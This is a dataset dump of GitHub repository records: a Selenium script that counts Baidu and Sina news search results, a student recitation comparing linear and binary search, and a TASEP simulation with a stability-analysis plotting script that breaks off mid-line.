Dataset schema (column, type, and observed range or number of classes):

column               type            range / classes
repo_name            stringlengths   5 to 114
repo_url             stringlengths   24 to 133
snapshot_id          stringlengths   40 to 40
revision_id          stringlengths   40 to 40
directory_id         stringlengths   40 to 40
branch_name          stringclasses   209 values
visit_date           timestamp[ns]
revision_date        timestamp[ns]
committer_date       timestamp[ns]
github_id            int64           9.83k to 683M
star_events_count    int64           0 to 22.6k
fork_events_count    int64           0 to 4.15k
gha_license_id       stringclasses   17 values
gha_created_at       timestamp[ns]
gha_updated_at       timestamp[ns]
gha_pushed_at        timestamp[ns]
gha_language         stringclasses   115 values
files                listlengths     1 to 13.2k
num_files            int64           1 to 13.2k
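A minimal sketch of how records with this schema could be loaded and sanity-checked with pandas, assuming the data is available locally as a Parquet shard; the filename sample.parquet and the variable name df are placeholders introduced for this example, not part of the original dataset.

```python
import pandas as pd

# Placeholder path: one locally available Parquet shard of the dataset.
df = pd.read_parquet("sample.parquet")

# The columns map one-to-one onto the schema listed above.
print(df.dtypes)

# Sanity checks against the documented ranges: star counts are non-negative,
# and num_files should match the length of the nested `files` list.
assert (df["star_events_count"] >= 0).all()
assert (df["num_files"] == df["files"].apply(len)).all()

# Quick look at the most-starred repositories in this shard.
print(df.sort_values("star_events_count", ascending=False)
        [["repo_name", "gha_language", "num_files"]].head())
```

Sample records follow; each keeps its nested `files` payload verbatim as stored in the dataset.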
Record 1:
repo_name: fanjingwei/observeNewsBroadcastOnInternet
repo_url: https://github.com/fanjingwei/observeNewsBroadcastOnInternet
snapshot_id: c97b5e65838ea057935c721f69213839c944c9ac
revision_id: c54299081c05f0bf68f7d69b6a1210d4efc3e980
directory_id: e227a6938d4404f2bdeff743259ff31fae80cf89
branch_name: refs/heads/master
visit_date: 2020-03-18T17:06:50.125027
revision_date: 2018-05-27T13:47:22
committer_date: 2018-05-27T13:47:22
github_id: 135,007,013
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.6695652008056641, "alphanum_fraction": 0.6739130616188049, "avg_line_length": 20, "blob_id": "4ea9e53cf525b20188110e16a979f1b8699e59b5", "content_id": "956003e077454f7e66560671b5d8c6dc1c70eca2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 242, "license_type": "no_license", "max_line_length": 37, "num_lines": 11, "path": "/testObserve.py", "repo_name": "fanjingwei/observeNewsBroadcastOnInternet", "src_encoding": "UTF-8", "text": "import unittest\nfrom observe import *\n\nclass ObserveTest(unittest.TestCase):\n\tdef testHotWord(self):\n\t\tstring = observeSina(\"区块链\",5)\n\t\twith open(\"区块链.sina\",'w') as f:\n\t\t\tf.write(string)\n\nif __name__ == '__main__':\n\tunittest.main()" }, { "alpha_fraction": 0.7190366983413696, "alphanum_fraction": 0.7370030283927917, "avg_line_length": 32.126583099365234, "blob_id": "a031dfb12f804365e5efe66a161960002db44629", "content_id": "680f0f360055d9b2a48d802cd6bd1028742e0b62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2684, "license_type": "no_license", "max_line_length": 77, "num_lines": 79, "path": "/testWebSiteIsChanged.py", "repo_name": "fanjingwei/observeNewsBroadcastOnInternet", "src_encoding": "UTF-8", "text": "import os\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.select import Select\n\nimport unittest\n\nclass WebSiteTest(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.browser = webdriver.Chrome(os.getcwd()+\"/3rdParty/chromedriver.exe\")\n\t\treturn\n\n\tdef tearDown(self):\n\t\tself.browser.close()\n\t\treturn\n\n\tdef testBaiduSearch(self):\n\t\tself.browser.get(\"http://www.baidu.com\")\n\t\tinputElement = self.browser.find_element_by_id(\"kw\")\n\t\tself.assertNotEqual(None, inputElement)\n\t\tinputElement.send_keys(\"范璟玮\")\n\t\tinputElement.send_keys(Keys.RETURN)\n\t\ttime.sleep(1)\n\n\t\tnum = self.browser.find_elements_by_class_name(\"nums_text\")\n\t\tself.assertEqual(1,len(num))\n\t\tsearchTool = self.browser.find_element_by_class_name(\"search_tool\")\n\t\tself.assertNotEqual(None, searchTool)\n\t\tsearchTool.click()\n\t\ttime.sleep(1)\n\n\t\tsearchTool_Time = self.browser.find_element_by_class_name(\"search_tool_tf\")\n\t\tself.assertNotEqual(None, searchTool_Time)\n\t\tsearchTool_Time.click()\n\t\ttime.sleep(1)\n\n\t\tstartTime = self.browser.find_elements_by_name(\"st\")\n\t\tself.assertEqual(1,len(startTime))\n\t\tstartTime[0].clear()\n\t\tstartTime[0].send_keys(\"2015-08-15\")\n\t\tendTime = self.browser.find_elements_by_name(\"et\")\n\t\tself.assertEqual(1,len(endTime))\n\t\tendTime[0].clear()\n\t\tendTime[0].send_keys(\"2015-08-30\")\n\t\tsubmit = self.browser.find_element_by_class_name(\"c-tip-custom-submit\")\n\t\tself.assertNotEqual(None, submit)\n\t\tsubmit.click()\n\t\ttime.sleep(1)\n\n\t\tresults = self.browser.find_elements_by_class_name(\"result\")\n\t\tself.assertEqual(2,len(results))\n\t\tresultNum = self.browser.find_element_by_class_name(\"nums_text\")\n\t\t#该项此时被隐藏,需要使用get_attribute(\"innerHTML\")方式获取\n\t\tself.assertEqual(\"百度为您找到相关结果约2个\",resultNum.get_attribute(\"innerHTML\"))\n\n\tdef testSinaSearch(self):\n\t\tself.browser.get(\"http://search.sina.com.cn/?c=adv\")\n\t\tinputElement = self.browser.find_element_by_name(\"all\")\n\t\tself.assertNotEqual(None, inputElement)\n\t\tinputElement.send_keys(\"区块链\")\n\t\tselectItem = 
self.browser.find_element_by_name(\"time\")\n\t\tself.assertNotEqual(None, selectItem)\n\t\tSelect(selectItem).select_by_value(\"custom\")\n\t\tstartTime = self.browser.find_element_by_id(\"s_time\")\n\t\tself.assertNotEqual(None, startTime)\n\t\tstartTime.send_keys(\"2018-05-23\")\n\t\tendTime = self.browser.find_element_by_id(\"e_time\")\n\t\tself.assertNotEqual(None, endTime)\n\t\tendTime.send_keys(\"2018-05-24\")\n\t\tsubmit = self.browser.find_element_by_id(\"submit_button\")\n\t\tself.assertNotEqual(None, submit)\n\t\tsubmit.click()\n\t\tr = self.browser.find_element_by_class_name(\"l_v2\")\n\t\tself.assertNotEqual(None, r)\n\n\nif __name__ == '__main__':\n\tunittest.main()" }, { "alpha_fraction": 0.7158458828926086, "alphanum_fraction": 0.7263548374176025, "avg_line_length": 28.065868377685547, "blob_id": "cb3104ca0bfcce01c2700be2149f9207ce59b5ca", "content_id": "e51593e7eae180107e4a5573651a93a472ae0b55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4995, "license_type": "no_license", "max_line_length": 91, "num_lines": 167, "path": "/observe.py", "repo_name": "fanjingwei/observeNewsBroadcastOnInternet", "src_encoding": "UTF-8", "text": "import os\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.select import Select\nfrom datetime import datetime\nfrom datetime import timedelta\n\ndef observeBaidu(key, cycle):\n\tbrowser = webdriver.Chrome(os.getcwd()+\"/3rdParty/chromedriver.exe\")\n\tbrowser.get(\"http://www.baidu.com\")\n\tinputElement = browser.find_element_by_id(\"kw\")\n\tinputElement.send_keys(key)\n\tinputElement.send_keys(Keys.RETURN)\n\ttime.sleep(10)\n\n\tcount = 1\n\tstart,end = getNextCycle(cycle, count)\n\ttryFunctionSomeTime(clickSearchTool, browser, 600)\n\tnum = filterResult(browser,start,end)\n\tstring = \"Key word:\"+ key + \" search by baidu\\n\" + record(start,end,num) + \"\\n\"\n\twhile num > 0:\n\t\tstart,end = getNextCycle(cycle, count)\n\t\tnum = filterResult(browser, start,end)\n\t\tstring+=record(start,end,num)+\"\\n\"\n\t\tprint(record(start,end,num)+\"\\n\")\n\t\ttime.sleep(1)\n\t\tcount+=1\n\tbrowser.close()\n\treturn string\n\ndef getNextCycle(cycle, count):\n\tendDay = datetime.now() - timedelta(days=cycle*(count-1))\n\tstartDay = datetime.now() - timedelta(days=cycle*count)\n\tstart = createDate(startDay)\n\tend = createDate(endDay)\n\treturn start, end\n\ndef createDate(day):\n\tyear = day.year\n\tmonth = day.month\n\td = day.day\n\tif month < 10:\n\t\tmonth = \"0\" + str(month)\n\telse:\n\t\tmonth = str(month)\n\tif d < 10:\n\t\td = \"0\" + str(d)\n\telse:\n\t\td = str(d)\n\treturn str(year)+\"-\"+month+\"-\"+d\n\t\ndef filterResult(browser, start, end):\n\tif not tryFunctionSomeTime(clickTimeFilter, browser, 240):\n\t\treturn 0xffffffff\n\tif not tryFunctionSomeTimeTreeParameters(clickTimeFilterSubmit, browser, start, end, 240):\n\t\treturn 0xffffffff\n\tr,v = tryFunctionSomeTimeWithReturn(getSearchResultNum, browser, 240)\n\tif r:\n\t\treturn v\n\telse:\n\t\treturn 0xffffffff\n\ndef tryFunctionSomeTime(function, parameter, maxTime):\n\tfor i in range(maxTime):\n\t\ttry:\n\t\t\tfunction(parameter)\n\t\texcept:\n\t\t\ttime.sleep(0.5)\n\t\tfinally:\n\t\t\treturn True\n\treturn False\n\ndef tryFunctionSomeTimeWithReturn(function, parameter, maxTime):\n\tfor i in range(maxTime):\n\t\ttry:\n\t\t\treturn True, function(parameter)\n\t\texcept:\n\t\t\ttime.sleep(0.5)\n\treturn False, None\n\ndef 
tryFunctionSomeTimeTreeParameters(function, para1, para2, para3, maxTime):\n\tfor i in range(maxTime):\n\t\ttry:\n\t\t\tfunction(para1, para2, para3)\n\t\texcept:\n\t\t\ttime.sleep(0.5)\n\t\tfinally:\n\t\t\treturn True\n\treturn False\n\ndef clickSearchTool(browser):\n\tsearchTool = browser.find_element_by_class_name(\"search_tool\")\n\tif not searchTool.is_displayed():\n\t\tsearchTool = undefineWord#不可见时也能查到,因此此时要主动造成异常,等待其可见\n\tsearchTool.click()\n\treturn\n\ndef clickTimeFilter(browser):\n\tsearchTool_Time = browser.find_element_by_class_name(\"search_tool_tf\")\n\tif not searchTool_Time.is_displayed():\n\t\tsearchTool_Time = undefineWord#不可见时也能查到,因此此时要主动造成异常,等待其可见\n\tsearchTool_Time.click()\n\treturn\n\ndef clickTimeFilterSubmit(browser, start, end):\n\tstartTime = browser.find_element_by_name(\"st\")\n\tstartTime.clear()\n\tstartTime.send_keys(start)\n\tendTime = browser.find_element_by_name(\"et\")\n\tendTime.clear()\n\tendTime.send_keys(end)\n\tsubmit = browser.find_element_by_class_name(\"c-tip-custom-submit\")\n\tsubmit.click()\n\ndef getSearchResultNum(browser):\n\tresultNum = browser.find_element_by_class_name(\"nums_text\")\n\tresult = resultNum.get_attribute(\"innerHTML\")\n\tstartPos = len('百度为您找到相关结果约')\n\tendPos = result.find('个')\n\treturn int(result[startPos:endPos].replace(',',\"\"))\n\ndef grabNumFromString(string, startStr, endStr):\n\tstartPos = len(startStr)\n\tendPos = string.find(endStr)\n\treturn int(string[startPos:endPos].replace(',',\"\"))\n\ndef record(start, end, num):\n\treturn start + \"~\" + end + \":\" + str(num)\n\ndef observeSina(key, cycle):\n\tbrowser = webdriver.Chrome(os.getcwd()+\"/3rdParty/chromedriver.exe\")\n\tcount = 1\n\tstart,end = getNextCycle(cycle, count)\n\tnum = oneSinaSearch(browser, key, start, end)\n\tcount+=1\n\tstring = \"Key word:\"+ key + \" search by sina\\n\" + record(start,end,num) + \"\\n\"\n\twhile num > 0:\n\t\tstart,end = getNextCycle(cycle, count)\n\t\tnum = oneSinaSearch(browser, key, start, end)\n\t\tstring+=record(start,end,num)+\"\\n\"\n\t\tprint(record(start,end,num))\n\t\tcount+=1\n\t\ttime.sleep(1)\n\tbrowser.close()\n\treturn string\n\ndef oneSinaSearch(browser, key, start, end):\n\tbrowser.get(\"http://search.sina.com.cn/?c=adv\")\n\tinputElement = browser.find_element_by_name(\"all\")\n\tinputElement.send_keys(key)\n\tselectItem = browser.find_element_by_name(\"time\")\n\tSelect(selectItem).select_by_value(\"custom\")\n\tstartTime = browser.find_element_by_id(\"s_time\")\n\tstartTime.send_keys(start)\n\tendTime = browser.find_element_by_id(\"e_time\")\n\tendTime.send_keys(end)\n\ttime.sleep(1)\n\tsubmit = browser.find_element_by_id(\"submit_button\")\n\tsubmit.click()\n\tresult = browser.find_element_by_class_name(\"l_v2\")\n\tnum = int(grabNumFromString(result.text, \"找到相关新闻\", \"篇\"))\n\tmod_bar = browser.find_element_by_class_name(\"mod_bar\")\n\tif 0 == len(mod_bar.find_elements_by_class_name(\"close\")):\n\t\treturn num\n\telse:\n\t\treturn 0" } ]
num_files: 3
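Each entry in a record's `files` list carries the repo-relative path, the decoded text, and the source encoding, so a repository snapshot can be rebuilt on disk. The sketch below is one hedged way to do that, using only fields visible in the record above; the function name materialize, the output directory restored_repo, and the use of df.iloc[0] from the earlier sketch are assumptions made for illustration.

```python
import os

def materialize(record, out_dir="restored_repo"):
    """Write every entry of a record's `files` list back to disk."""
    for f in record["files"]:
        # `path` is repo-relative with a leading slash, e.g. "/observe.py".
        target = os.path.join(out_dir, f["path"].lstrip("/"))
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with open(target, "w", encoding=f.get("src_encoding", "UTF-8")) as fh:
            fh.write(f["text"])

# Example usage (assumed df from the sketch above):
# materialize(df.iloc[0]) recreates testObserve.py, testWebSiteIsChanged.py
# and observe.py under restored_repo/.
```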
Record 2:
repo_name: allan-tulane/recitation-01-hduece
repo_url: https://github.com/allan-tulane/recitation-01-hduece
snapshot_id: 67b6eb0b6e293e632d1b7d670f9302779ad91f80
revision_id: 2f9330e114ba906d797fe241ffdf2de0bb940659
directory_id: 6c253d22ab4dd85b8cccadf3c1d328a00d7b8916
branch_name: refs/heads/main
visit_date: 2023-02-23T23:23:04.131511
revision_date: 2021-02-01T03:53:09
committer_date: 2021-02-01T03:53:09
github_id: 333,800,782
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_created_at: 2021-01-28T15:30:08
gha_updated_at: 2021-01-28T15:30:17
gha_pushed_at: 2021-01-28T15:30:17
gha_language: Python
files:
[ { "alpha_fraction": 0.6872079372406006, "alphanum_fraction": 0.7441588640213013, "avg_line_length": 78.6279067993164, "blob_id": "3e773d30d209f437fd2798bd42c3052827cc0459", "content_id": "cdd9fc866cd692ef179813e3aca0603e50c6d1e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6848, "license_type": "no_license", "max_line_length": 420, "num_lines": 86, "path": "/README.md", "repo_name": "allan-tulane/recitation-01-hduece", "src_encoding": "UTF-8", "text": "[![Work in Repl.it](https://classroom.github.com/assets/work-in-replit-14baed9a392b3a25080506f3b7b6d57f295ec2978f6f33ec97e36a161684cbe9.svg)](https://classroom.github.com/online_ide?assignment_repo_id=3989531&assignment_repo_type=AssignmentRepo)\n# CMPS 2200 Recitation 01\n\n**Names (Team Members):** Hailey Dusablon, Abe Messing, Shengkai Qin, Alexis Preston, Daniel Ellsworth \n\n\nIn this recitation, we will investigate asymptotic complexity. Additionally, we will get familiar with the various technologies we'll use for collaborative coding.\n\nTo complete this recitation, follow the instructions in this document. Some of your answers will go in this file, and others will require you to edit `main.py`.\n\n\n## Setup\n- Make sure you have a Github account.\n- Login to Github.\n- Login to repl.it, using \"sign in with github\"\n- Click on the assignment link sent through canvas and accept the assignment. \n- Click on your personal github repository for the assignment (e.g., https://github.com/allan-tulane/recitation-01-your_username).\n- Click on the \"Work in Repl.it\" button. This will launch an instance of `repl.it` initialized with the code from your repository.\n- You'll work with a partner to complete this recitation. To do so, we'll break you into Zoom rooms. You will be able to code together in the same `repl.it` instance. You can choose whose repl.it instance you will share. This person will click the \"Share\" button in their repl.it instance and email the lab partner.\n\n## Running and testing your code\n- In the command-line window, run `./ipy` to launch an interactive IPython shell. This is an interactive shell to help run and debug your code. Any code you change in `main.py` will be reflected from this shell. So, you can modify a function in `main.py`, then test it here.\n + If it seems things don't refresh, try running `from main import *`\n- You can exit the IPython prompt by either typing `exit` or pressing `ctrl-d`\n- To run tests, from the command-line shell, you can run\n + `pytest main.py` will run all tests\n + `pytest main.py::test_one` will just run `test_one`\n + We recommend running one test at a time as you are debugging.\n\n## Turning in your work\n\n- Once complete, click on the \"Version Control\" icon in the left pane on repl.it.\n- Enter a commit message in the \"what did you change?\" text box\n- Click \"commit and push.\" This will push your code to your github repository.\n- Although you are working as a team, please have each team member submit the same code to their repository. One person can copy the code to their repl.it and submit it from there.\n\n## Comparing search algorithms\n\nWe'll compare the running times of `linear_search` and `binary_search` empirically.\n\n- [ ] 1. In `main.py`, the implementation of `linear_search` is already complete. Your task is to implement `binary_search`. Implement a recursive solution using the helper function `_binary_search`. \n\n- [ ] 2. 
Test that your function is correct by calling from the command-line `pytest main.py::test_binary_search`\n\n- [ ] 3. Write at least two additional test cases in `test_binary_search` and confirm they pass.\n\n- [ ] 4. Describe the worst case input value of `key` for `linear_search`? for `binary_search`? \n\n**TODO: The worst case input value for linear search is a value that is not in the list because it will have to search through the entire list to determine that it is not there. The worst case value for binary search is also a value that is not in the list because it will have to search through the entire list to determine that it is not there, though it directly searched through less values than the linear search.**\n\n- [ ] 5. Describe the best case input value of `key` for `linear_search`? for `binary_search`? \n\n**TODO: For linear search, the best case input value is the first value in the list because it will only have to run one time. For binary search, the value in the middle of the list is the best case input value as it is the first one to be compared to the key. **\n\n- [ ] 6. Complete the `time_search` function to compute the running time of a search function. Note that this is an example of a \"higher order\" function, since one of its parameters is another function.\n\n- [ ] 7. Complete the `compare_search` function to compare the running times of linear search and binary search. Confirm the implementation by running `pytest main.py::test_compare_search`, which contains some simple checks.\n\n- [ ] 8. Call `print_results(compare_search())` and paste the results here:\n\n**TODO:Running this code in main gave us an error in code given to us by the lab., which I have pasted below.**\nmain.py:89: in <module>\n print_results(compare_search())\nmain.py:74: in print_results\n print(tabulate.tabulate(results,\n/opt/virtualenvs/python3/lib/python3.8/site-packages/tabulate.py:1426: in tabulate\n list_of_lists, headers = _normalize_tabular_data(\n/opt/virtualenvs/python3/lib/python3.8/site-packages/tabulate.py:1103: in _normalize_tabular_data\n rows = list(map(list, rows))\nE TypeError: 'float' object is not iterable\n=========================== short test summary info ============================\nERROR main.py - TypeError: 'float' object is not iterable\n!!!!!!!!!!!!!!!!!!!! Interrupted: 1 error during collection !!!!!!!!!!!!!!!!!!!!\n\n**The print out of our results tuple is pasted here, as I believe it is closer to the intended answer for this question.**\n[10.0, 0.0030994415283203125, 0.0057220458984375, 100.0, 0.0019073486328125, 0.003814697265625, 1000.0, 0.0016689300537109375, 0.00286102294921875, 10000.0, 0.0019073486328125, 0.003337860107421875, 100000.0, 0.0019073486328125, 0.0030994415283203125, 1000000.0, 0.0021457672119140625, 0.00286102294921875, 10000000.0, 0.001430511474609375, 0.0035762786865234375]\n\n\n- [ ] 9. The theoretical worst-case running time of linear search is $O(n)$ and binary search is $O(log_2(n))$. Do these theoretical running times match your empirical results? Why or why not?\n\n**TODO: Not exactly. This does not match the big O analysis, because there are not enough iterations for us to see the difference and big O is based on worst case time complexity. However, if the lists we are searching were much longer, it would be more likely we notice the predicted runtime differences.**\n\n- [ ] 10. Binary search assumes the input list is already sorted. Assume it takes $\\Theta(n^2)$ time to sort a list of length $n$. 
Suppose you know ahead of time that you will search the same list $k$ times. \n + What is worst-case complexity of searching a list of $n$ elements $k$ times using linear search? **TODO: O(nk) **\n + For binary search? **TODO: O(n^2) + O(logn * k) = O(n^2 + (logn \\* k))**\n + For what values of $k$ is it more efficient to first sort and then use binary search versus just using linear search without sorting? **TODO: It makes sense to sort and use binary search when k > n.**\n" }, { "alpha_fraction": 0.5666842460632324, "alphanum_fraction": 0.623089075088501, "avg_line_length": 20.79310417175293, "blob_id": "f21c059be2d6e62599cb72e4b9a3c53d917c78ef", "content_id": "c2871143a67ac6e215eb25c88efbfe757ed51f21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1897, "license_type": "no_license", "max_line_length": 62, "num_lines": 87, "path": "/main.py", "repo_name": "allan-tulane/recitation-01-hduece", "src_encoding": "UTF-8", "text": "\"\"\"\nCMPS 2200 Recitation 1\n\"\"\"\n\n### the only imports needed are here\nimport tabulate\nimport time\n###\n\ndef linear_search(mylist, key):\n\t\"\"\" done. \"\"\"\n\tfor i,v in enumerate(mylist):\n\t\tif v == key:\n\t\t\treturn i\n\treturn -1\n\ndef test_linear_search():\n\t\"\"\" done. \"\"\"\n\tassert linear_search([1,2,3,4,5], 5) == 4\n\tassert linear_search([1,2,3,4,5], 1) == 0\n\tassert linear_search([1,2,3,4,5], 6) == -1\n\ndef binary_search(mylist, key):\n\t\"\"\" done. \"\"\"\n\treturn _binary_search(mylist, key, 0, len(mylist)-1)\n\ndef _binary_search(mylist, key, left, right):\n\n\twhile left <= right:\n\t\tmiddle = (left+right)//2\n\t\tif mylist[middle] == key:\n\t\t\treturn middle\n\t\telif mylist[middle] > key:\n\t\t\treturn _binary_search(mylist,key,left,middle-1)\n\t\telif mylist[middle] < key:\n\t\t\treturn _binary_search(mylist,key,middle+1,right)\n\treturn -1\n\ndef test_binary_search():\n\tassert binary_search([1,2,3,4,5], 5) == 4\n\tassert binary_search([1,2,3,4,5], 1) == 0\n\tassert binary_search([1,2,3,4,5], 6) == -1\n\t### TODO: add two more tests here.\n\t###\n\tassert binary_search([1,2], 5) == -1\n\tassert binary_search([], 2) == -1\n\ndef time_search(search_fn, arr, key):\n\tstart_time1 = time.time()\n\tsearch_fn(arr, key,)\n\tend_time1 = time.time()\n\n\tfinal_time1 = (end_time1 - start_time1)*1000\n\n\treturn final_time1\n\t\n\t### TODO\n\t###\n\ndef compare_search(sizes=[1e1, 1e2, 1e3, 1e4, 1e5, 1e6, 1e7]):\n\tkey = -1\n\tresults = []\n\tfor i in sizes:\n\t\tline = time_search(linear_search, sizes, -1)\n\t\tbinary = time_search(binary_search, sizes, -1)\n\t\tresults += (i, line, binary)\n\treturn results\n\n\t### TODO\n\t###\n\ndef print_results(results):\n\t\"\"\" done \"\"\"\n\tprint(tabulate.tabulate(results,\n\t\t\t\t\t\t\theaders=['n', 'linear', 'binary'],\n\t\t\t\t\t\t\tfloatfmt=\".3f\",\n\t\t\t\t\t\t\ttablefmt=\"github\"))\n\n\ndef test_compare_search():\n\tres = compare_search(sizes=list(range(10, 100)))\n\tprint(res)\n\n\tassert res[0] == 10\n\t#assert res[1][0] == 100\n\t#assert res[0][1] < 1\n\t#assert res[1][1] < 1py\n\n" } ]
num_files: 2
Record 3:
repo_name: AlexMilog/norway
repo_url: https://github.com/AlexMilog/norway
snapshot_id: d578c553f0fe15287e2ad4e7bfda4b1a8cd4c879
revision_id: 6f25ad673b9b2047ba2b51b4a96c1b8abe3c7b71
directory_id: 0ac531e6a70390782cd3c4ed4e16ef2d6acbd9af
branch_name: refs/heads/main
visit_date: 2023-01-06T17:10:50.629502
revision_date: 2020-11-06T19:34:01
committer_date: 2020-11-06T19:34:01
github_id: 301,002,925
star_events_count: 0
fork_events_count: 1
gha_license_id: null
gha_created_at: null
gha_updated_at: null
gha_pushed_at: null
gha_language: null
files:
[ { "alpha_fraction": 0.38091331720352173, "alphanum_fraction": 0.4137271046638489, "avg_line_length": 40.034481048583984, "blob_id": "fa3fe5be42d1ffe72825ca1e3169efed93a1aab9", "content_id": "65cf209e3d452d5873d15a9053e2d3e21f9b49ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3657, "license_type": "no_license", "max_line_length": 110, "num_lines": 87, "path": "/TASEP model.py", "repo_name": "AlexMilog/norway", "src_encoding": "UTF-8", "text": "import numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nN1, N2, N3 = 100, 200, 100\r\nL = N1 + N2 + N3\r\nlifetime = 1000\r\nrealizations = 10\r\nstartpoint = 0\r\nstep, endpoint = 0.1, 1.1\r\nro_range = np.arange(startpoint, endpoint, step)\r\n#c0_range = [5, 10, 20, 50, 100, 150]\r\nc0_range = [5]\r\n\r\n\r\ndef swap(listt, pos1, pos2):\r\n listt[pos1], listt[pos2] = listt[pos2], listt[pos1]\r\n return listt\r\n\r\n\r\nfor c0 in c0_range:\r\n print(c0)\r\n c = c0 / N2\r\n output = []\r\n inputt = []\r\n for ro in ro_range:\r\n current_counter = 0\r\n ro_zero = 0\r\n print('ro = ', f'{ro:.2f}')\r\n for realization in range(realizations):\r\n print('realization = ', realization)\r\n rna = np.zeros((L,), dtype=np.int)\r\n for t in range(lifetime):\r\n filled = []\r\n for i in range(len(rna)):\r\n if rna[i] != 0:\r\n filled.append(i)\r\n if filled:\r\n insertion = np.random.choice(np.arange(len(filled)))\r\n for i in range(len(filled)):\r\n if not filled:\r\n continue\r\n choice = np.random.choice(filled)\r\n e_prob = np.random.uniform(0, 1)\r\n if insertion == i:\r\n p = np.random.uniform(0, 1)\r\n if p <= ro and rna[0] == 0:\r\n rna[0] = 1\r\n if choice != N1 - 1 and choice != L - 1 and rna[choice] == 1 and rna[choice + 1] == 0:\r\n swap(rna, choice, choice + 1)\r\n del filled[filled.index(choice)]\r\n elif choice != N1 + N2 - 1 and rna[choice] == 2 and rna[choice + 1] == 0:\r\n swap(rna, choice, choice + 1)\r\n del filled[filled.index(choice)]\r\n elif choice == N1 - 1 and e_prob <= c and rna[choice + 1] == 0:\r\n swap(rna, choice, choice + 1)\r\n rna[choice + 1] = 2\r\n del filled[filled.index(choice)]\r\n elif choice == N1 - 1 and e_prob > c and rna[choice + 1] == 0:\r\n swap(rna, choice, choice + 1)\r\n del filled[filled.index(choice)]\r\n elif choice != N1 + N2 - 1 and rna[choice] == 2 and rna[choice + 1] == 1:\r\n swap(rna, choice, choice + 1)\r\n rna[choice] = 0\r\n del filled[filled.index(choice)]\r\n del filled[filled.index(choice + 1)]\r\n elif choice == N1 + N2 - 1 and rna[choice] == 2:\r\n rna[choice] = 0\r\n del filled[filled.index(choice)]\r\n elif choice == L - 1:\r\n rna[choice] = 0\r\n current_counter += 1\r\n del filled[filled.index(choice)]\r\n else:\r\n p = np.random.uniform(0, 1)\r\n if p <= ro and rna[0] == 0:\r\n rna[0] = 1\r\n if rna[0] == 1:\r\n ro_zero += 1\r\n ro_zero = ro_zero / (realizations * lifetime)\r\n inputt.append(ro_zero)\r\n current_counter = current_counter/(2*realizations * lifetime)\r\n output.append(current_counter)\r\n print(inputt)\r\n print(output)\r\n plt.plot(inputt, output, 'ro')\r\n plt.xlim(0, 1)\r\n plt.show()\r\n" }, { "alpha_fraction": 0.45026302337646484, "alphanum_fraction": 0.5111093521118164, "avg_line_length": 30.605459213256836, "blob_id": "8bbc4d890c6fbee96b08433d524bc45b369b76a4", "content_id": "cdaa4e19beac6ff04e9238330ced1efc1b079aa2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12737, "license_type": "no_license", "max_line_length": 117, "num_lines": 
403, "path": "/stability_analysis.py", "repo_name": "AlexMilog/norway", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider, Button\nfrom matplotlib.ticker import FuncFormatter\nimport numpy as np\n\n\ndef my_formatter(x, pos):\n if x.is_integer():\n return str(int(x))\n else:\n return str(round(x, 3))\n\n\nformatter = FuncFormatter(my_formatter)\n\nwpred = np.array([0., 0., 0., 0.])\nspred = 0\narrayofs = [spred]\n\n\ndef vectorfield(w, t, p):\n global wpred\n global spred\n global arrayofs\n\n x1, x2, x3, x4 = w\n smallk, bigk, delta = p\n if t == 0:\n stop = spred\n else:\n stop = min(1.0, max(-1.0, (w[0] - w[1]) - (wpred[0] - wpred[1]) + spred))\n f = smallk * (x1 - x2) + stop\n func = np.array([x3, x4, -f - x2 * bigk, f - x4 * delta])\n\n wpred = w\n spred = stop\n arrayofs.append(stop)\n\n return func\n\n\ndef syssolver(func, x0, t, p, dt):\n global arrayofs\n arrayofs = [spred]\n ans = [x0]\n for i in range(len(t)):\n ans.append(ans[-1] + dt * func(ans[-1], i, p))\n return ans\n\n\nbigk = 10\ndelta = 0.5\nsmallk = 10\nsols = [spred]\n\nif spred == 0:\n coeffs = [1, delta, 2 * smallk, smallk * delta, smallk * bigk]\n eigs = np.roots(coeffs)\nelse:\n coeffs = [1, delta, 2 * (smallk + 1), (smallk + 1) * delta, (smallk + 1) * bigk]\n eigs = np.roots(coeffs)\n\nstoptime = 5000\nnumpoints = stoptime*50\n\nt = [stoptime * float(i) / float(numpoints - 1) for i in range(numpoints)]\np = [smallk, bigk, delta]\nw0 = wpred\nwsol = syssolver(vectorfield, w0, t, p, (t[1] - t[0]) / 10.0)\n\nfig, ax = plt.subplots(1, 2)\nplt.subplots_adjust(left=0.1, bottom=0.3)\n\nsolx = []\nfor i in range(0, len(wsol)):\n solx.append(wsol[i][0] - wsol[i][1])\n\nx1_sol = []\nx2_sol = []\n\nfor n in range(len(t)):\n x1_sol.append(wsol[n][0])\n x2_sol.append(wsol[n][1])\n\n#sols = [0]\nfor i in range(0, len(wsol) - 1):\n sols.append(arrayofs[i])\n\nl, = ax[0].plot(solx, sols, lw=1)\nl1, = ax[0].plot(solx[0], sols[0], 'ro')\nplt.xticks(fontsize=15)\nplt.yticks(fontsize=15)\nl2, = ax[1].plot(x1_sol, x2_sol, lw=2)\n#l2, = ax[1].plot(wsol[2], wsol[3], lw=2)\neq1 = -sols[-1] / smallk\nl4, = ax[1].plot(eq1, 0, 'kX', lw=2)\nll = -1 / smallk\nrl = -ll\nl5, = ax[1].plot(ll, 0, '>m', lw=3)\nl6, = ax[1].plot(rl, 0, '<m', lw=2)\nl7, = ax[1].plot(x1_sol[-1], x2_sol[-1], 'rx', 